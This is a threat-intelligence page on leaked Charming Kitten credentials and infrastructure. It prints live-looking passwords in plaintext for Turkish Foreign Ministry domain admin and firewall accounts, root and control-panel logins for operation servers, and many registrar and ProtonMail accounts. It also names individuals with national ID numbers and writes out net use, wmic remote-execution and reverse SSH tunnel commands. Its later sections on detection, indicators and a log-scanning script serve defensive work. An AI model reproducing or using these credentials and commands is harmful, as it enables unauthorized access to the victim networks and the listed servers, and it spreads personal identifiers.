SENSITIVE INFORMATION: This page contains actual credentials exposed from Charming Kitten’s operations. This information is provided for threat intelligence, incident response, and defensive security purposes only. Do not use for unauthorized access.

Overview

Episode 4 exposed extensive credential information maintained in plaintext Excel spreadsheets by:
  • MOHAMMAD NAJAFLOO (National ID: 4270878835) - Original credential database maintainer
  • MOHAMMADERFAN HAMIDIAREF (National ID: 0023199709) - Current maintainer
These credentials span:
  • Internal network access to compromised organizations
  • Communication platforms (ISABELLE, 3CX, SIGNAL)
  • File extraction and storage systems
  • Infrastructure management accounts

Internal Network Credentials

Turkish Foreign Ministry (MFA) Compromise

From eposta.txt found with BellaCiao source code:
Primary Admin Account:
Username: Admin1@MFA
Password: KazimAtes1977+-*/!!KazimAtes1977+-*/!!

Usage: Domain-wide administrative access
WMIC commands: 
- Remote process execution
- File access across network
- Session management

Network Shares:
net use \\10.20.101.17\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA
net use \\10.20.105.21\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA
net use \\10.20.105.11\c$ KazimAtes1977+-*/!!KazimAtes1977+-*/!! /user:Admin1@MFA
pfSense/Network Admin:
Username: pfsenselondra@MFA
Password: 1234qqqQQQ

Usage: Firewall and network management

Remote Execution:
wmic /NODE:"10.20.105.25" /USER:"pfsenselondra@MFA" /PASSWORD:"1234qqqQQQ" 
  Process Call Create "cmd.exe /c reset session 3 >c:\\windows\\temp\\log.txt 2>&1"
Reverse SSH Tunnel User:
Username: ruby
Password: ruby@123!

Server: 103.57.251.153:443
Local Port: 40455
Remote Target: 10.20.105.11:3389

Command:
echo Y | c:\\windows\\temp\\vmware-tools.exe 103.57.251.153 -P 443 -C 
  -R 0.0.0.0:40455:10.20.105.11:3389 -l ruby -pw ruby@123!

Secondary Tunnel:
Username: Israel
Password: Israel@123!
Domains: twittsupport.com / msn-center.uk

Compromised Internal Network Topology

Documented internal IPs with access credentials:
| IP Address | System | Access Method | Credentials |
|---|---|---|---|
| 10.20.105.11 | Primary staging server | SMB/WMIC | Admin1@MFA |
| 10.20.105.21 | Secondary target | SMB | Admin1@MFA |
| 10.20.105.25 | Workstation | WMIC | pfsenselondra@MFA |
| 10.20.101.17 | Domain controller | SMB/WMIC | Admin1@MFA |
| 10.20.101.2 | TMG Server | WMIC | Admin1@MFA |
| 10.20.101.43 | Log collection | SMB share | Admin1@MFA |
| 10.20.106.60 | Compromised host | WMIC | Admin1@MFA |

Infrastructure Management Credentials

Hosting Provider Accounts

TheOnionHost

Multiple Operations
Moses Staff:
Israel Talent:
Dreamy Jobs:
Wazayif Halima:
Tecret:

Impreza Host

Tor Hosting Services
Moses Staff:
Abrahams Ax Tor:
Abrahams Ax Host:

PQ Hosting

BBM Movement
VPS:
  • bill.pq.hosting
  • [email protected]
  • 5U5v6L0s
  • Date: 20/02/2024 - €21 (3 months)
  • Ticket: #2070
ISPMGR:

ModernizMir

Domain & Hosting Reseller
SecNetDC:
  • [email protected]
  • MXQ8GLX5qg3yEUV
  • Host: 23/8/2023 - $10
  • Domain: 10/1/2025 - $70
  • API: 3A5MBwQsQvJdernıZ3FtFMPnoБs6HfMdWK
  • Ticket: #2063
Tecret Domain:

Domain Registrar Accounts

Cavinet:
Account: [email protected]
Password: CMEPZ9WMb8difTw
Domain: cavinet.org
Registration: 1/12/2022 - $60 (3 months)
Ticket: #2016

Moses Staff .io:
Account: [email protected]
Password: JHg&%asjh98*&^$dI&*^fd
Domain: moses-staff.io
Registration: 1/9/2024
Ticket: #2073

Moses Staff .to:
Account: [email protected]
Password: ghfycf6787$DSHJ&^%#q
Domain: moses-staff.to
Registration: 1/9/2024

Server Root Access

Direct root access credentials to operational infrastructure servers.
Abrahams Ax Server:
IP: 95.183.53.24
Root User: root
Root Password: Kcbha6ZsBuTg

aaPanel Control:
URL: https://95.183.53.24:37065/f63a6767
Username: le6ddou3
Password: 1cafff29

Moses Staff New Host:
URL: http://95.183.51.49:7800/88e6c70
Username: hhtfhtmz  
Password: EyfjC5t5bH@3eqw

Communication Platform Credentials

Internal Communication Systems

Charming Kitten used multiple platforms for internal coordination:

ISABELLE

Internal Chat Platform
  • IRGC-IO standard communication tool
  • Used for operational coordination
  • Referenced in Episode 1 & 2 leaks
  • Internal network only

3CX

VoIP Communication
  • Voice and messaging platform
  • Operational discussions
  • Employee coordination
  • Internal deployment

SIGNAL

Encrypted Messaging
  • External communications
  • Operational security
  • Mobile coordination
  • Mentioned in documentation

ProtonMail Accounts

Extensive use of ProtonMail for operational security:
| Email Account | Password | Operations | Ticket |
|---|---|---|---|
| [email protected] | CMEPZ9WMb8difTw | Cavinet infrastructure | #2016 |
| [email protected] | 5U5v6L0s | BBM Movement hosting | #2070 |
| [email protected] | MXQ8GLX5qg3yEUV | SecNetDC services | #2063 |
| [email protected] | RN8OiQ6Y(%H0 (host) / 2tJuGXqHFbAJNjS (domain) | Tecret infrastructure | #2067 |
| [email protected] | JHg&%asjh98*&^$dI&*^fd | Moses Staff .io | #2073 |
| [email protected] | ghfycf6787$DSHJ&^%#q | Moses Staff .to | - |
| [email protected] | jgfk&^%hngGJ54*/s+*&%$hggfaD (TOR) / rbC5vMjZh98AGTe (impreza) | Moses Staff hosting | #2023/#ms |
| [email protected] | GF675%^#@6-*GH678f-G / HG^&%hg4156-*fsv | Moses Staff CloudDNS | #2056 |
| recivestaff | CxZZspFuUfZF3m3-G | Moses Staff mailbox | #2041 |
| [email protected] | {1h)p0f_R(Ln / Kh74QjGDq35NtvB | Israel Talent | #2029 |
| [email protected] | Ubefrp / zNUyBQVwb6jqT5M | Termite.nu | - |
| [email protected] | 15aB@gd52$kD# | Dreamy Jobs host | #2066 |
| [email protected] | 7?n9”b/Aj~)6A | Dreamy Jobs & Wazayif domains | #2065/#2069 |
| [email protected] | n!hnuec?‘9*Pb2D | Wazayif Halima host | - |
| [email protected] | J7Z4pw-G (domain) / 6EF94ELUgAKdPqH (creds) / dm4ac2FgrL#-G (host) | Abrahams Ax | - |
| [email protected] | vAFc,7mNvi+-G | Abrahams Ax TOR | - |
| [email protected] | JHGF&(^T&OYGI / KUIYR(*&UG^&*Y | SSL certificates | - |

Alternate Email Services

Outlook Account:
[email protected]:YHJ*^&R(&FY%RE%&*
Purpose: SSL certificate registration alternate contact

File Extraction Systems

Data Exfiltration Methods

From Episode 4 documentation and BellaCiao analysis:
BellaCiao Webshell Interface

The deployed webshells provided file extraction capabilities:
# Webserver binding (from iis.ps1)
Local Interface: http://127.0.0.1:49450/
Reverse Tunnel: 127.0.0.1:9090 -> 127.0.0.1:49450

Features:
- File upload
- File download  
- Command execution
- Script execution
- Directory browsing
Webshell Deployment Paths:
IIS:
c:\inetpub\wwwroot\aspnet_client\aspnet.aspx
c:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx

Exchange Server:
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx  
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx

Data Staging Locations

Compromised systems were used as staging points:
Turkish MFA Network:
c:\windows\temp\Crashpad\log.txt
c:\windows\temp\vmware-tools.exe
c:\windows\temp\vmware.bat
c:\windows\temp\vmware.ps1
c:\programdata\microsoft\diagnostic\vmware-tools.exe
c:\programdata\microsoft\diagnostic\svchost.bat  
c:\programdata\microsoft\diagnostic\log.txt
F:\G0199911\ (Large data volume)

SMS and Verification Services

SMS PVA:
Service: smspva.com
Operation: Termite.nu
Date: 25/8/2022
Cost: $8
Ticket: #2045
Purpose: WhatsApp verification for phishing operations

Payment and Financial Credentials

Bitcoin Payment Tracking

Episode 4 includes 0-SERVICE-payment BTC.csv documenting Bitcoin transactions for infrastructure purchases.
The group maintained detailed records of BTC payments for:
  • Anonymous hosting services
  • Domain registrations through privacy-focused registrars
  • VPN and tunnel services
  • SMS verification services

Credential Security Analysis

Password Patterns

  1. High Complexity Strings: Random-looking combinations like jgfk&^%hngGJ54*/s+*&%$hggfaD
  2. Memorable Patterns: KazimAtes1977+-*/!!KazimAtes1977+-*/!! (repeated)
  3. Simple Passwords: 1234qqqQQQ, ruby@123!, Israel@123!
  4. Mixed Complexity: Some accounts use strong passwords, others use weak
  5. Special Characters: Heavy use of !@#$%^&*()
  6. No MFA: No evidence of multi-factor authentication

Operational Security Failures

Critical OPSEC Failures Identified:
  1. Plaintext Storage: All credentials stored in unencrypted Excel spreadsheets
  2. Centralized Documentation: Single point of failure for entire infrastructure
  3. Credential Reuse: Same ProtonMail accounts used across multiple services
  4. Predictable Patterns: Observable patterns in email account creation
  5. No Rotation: No evidence of credential rotation procedures
  6. Internal Network Compromise: Domain admin credentials documented in plaintext
  7. Shared Access: Multiple operators with access to credential database
  8. No Compartmentalization: Single spreadsheet contains all operational credentials

Ticket System

The group used a ticketing system for tracking infrastructure:
| Ticket Format | Operations | Examples |
|---|---|---|
| #20XX | Numbered tickets | #2016, #2023, #2041, #2073 |
| #[operation] | Operation-specific | #bbm, #ms |
This system provides a timeline and attribution mechanism for infrastructure deployment.

Detection Recommendations

For Defenders:
  1. Credential Monitoring: Monitor for use of exposed credentials in authentication logs
  2. Email Pattern Detection: Watch for ProtonMail accounts with similar naming patterns
  3. Payment Trail Analysis: Track Bitcoin transactions to identified infrastructure providers
  4. Infrastructure Correlation: Cross-reference hosting providers with known campaigns
  5. Network Indicators: Monitor for connections to documented internal IPs (10.20.*.*)

Compromise Indicators

If your organization was targeted, check for:
1. Account Activity

Search Active Directory for accounts matching: Admin1@MFA, pfsenselondra@MFA, or similar patterns
2. File Presence

Check for files at documented staging locations:
  • c:\windows\temp\vmware-tools.exe
  • c:\programdata\microsoft\diagnostic\*.exe
  • c:\inetpub\wwwroot\aspnet_client\*.aspx
3. Network Connections

Review firewall logs for connections to:
  • 103.57.251.153:443 (tunnel server)
  • 95.169.196.* (hosting infrastructure)
  • 95.183.51.* / 95.183.53.* (operation servers)
  • 212.175.168.58 (C2 server)
4. Service Presence

Check for malicious Windows services:
  • "Microsoft Exchange Services Log"
  • "Microsoft Exchange Agent Diagnostic Services"
  • "Microsoft Monitoring Exchange Services"
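The network indicators from step 3 and the account names from step 1 can be checked against log exports mechanically. The script below is an added example, not part of the leaked material or of this page's original content; its key=value log format, field names and sample lines are constructed for illustration, while the IP ranges, ports and account names are taken from the indicators above.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Indicators copied from the "Compromise Indicators" section of this page.
TUNNEL_SERVER = ("103.57.251.153", 443)
C2_SERVER = "212.175.168.58"
HOSTING_RANGES = [ipaddress.ip_network(n) for n in ("95.169.196.0/24", "95.183.51.0/24", "95.183.53.0/24")]
EXPOSED_ACCOUNTS = {"admin1@mfa", "pfsenselondra@mfa"}
# Constructed key=value log format (assumption); adapt the two regexes to your own SIEM export.
FW_LINE = re.compile(r"\bsrc=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)")
AUTH_LINE = re.compile(r"\blogon\s+user=(?P<user>\S+)", re.IGNORECASE)

def classify_destination(dst: str, dport: int) -> Optional[str]:
    """Return why a destination is suspicious, or None if it matches no indicator."""
    if (dst, dport) == TUNNEL_SERVER:   # port-specific: the tunnel listener was on 443
        return "reverse SSH tunnel server"
    if dst == C2_SERVER:                # any port towards the C2 address is worth a look
        return "C2 server"
    try:
        addr = ipaddress.ip_address(dst)
    except ValueError:                  # hostnames or malformed fields never match a range
        return None
    for net in HOSTING_RANGES:
        if addr in net:
            return f"operation/hosting range {net}"
    return None

def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (log line, reason) for every line that touches a documented indicator."""
    hits = []
    for line in lines:
        fw, auth = FW_LINE.search(line), AUTH_LINE.search(line)
        reason = classify_destination(fw["dst"], int(fw["dport"])) if fw else None
        if auth and auth["user"].lower() in EXPOSED_ACCOUNTS:
            reason = f"exposed account {auth['user']}"
        if reason:
            hits.append((line.strip(), reason))
    return hits

# Constructed sample lines: tunnel contact, benign HTTPS flow, aaPanel host, C2 contact, leaked-account logon.
SAMPLE_LOGS = [
    "2024-03-01T10:00:00Z fw src=10.20.105.11 dst=103.57.251.153 dport=443 action=allow",
    "2024-03-01T10:00:05Z fw src=10.20.105.11 dst=198.51.100.7 dport=443 action=allow",
    "2024-03-01T10:01:00Z fw src=10.20.101.17 dst=95.183.53.24 dport=37065 action=allow",
    "2024-03-01T10:02:00Z fw src=10.20.106.60 dst=212.175.168.58 dport=80 action=allow",
    "2024-03-01T10:03:00Z dc logon user=Admin1@MFA src=10.20.105.25 result=success",
]

if __name__ == "__main__": print(*scan(SAMPLE_LOGS), sep="\n")
```

The tunnel server is matched on address and port because the page documents only the 443 listener, whereas the C2 address and the hosting ranges are flagged on any port.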

References

  • Episode 4 leak: 0-SERVICE-Service.csv - Infrastructure credential database
  • Episode 4 leak: 1-NET-Sheet1.csv - Network topology
  • Episode 4 leak: 0-SERVICE-payment BTC.csv - Payment records
  • Episode 3 leak: eposta.txt - Turkish MFA compromise credentials
  • Episode 3 leak: BellaCiao source code - Embedded credentials and infrastructure
  • Episode 1 & 2: Internal communication platform references (ISABELLE, 3CX, SIGNAL)
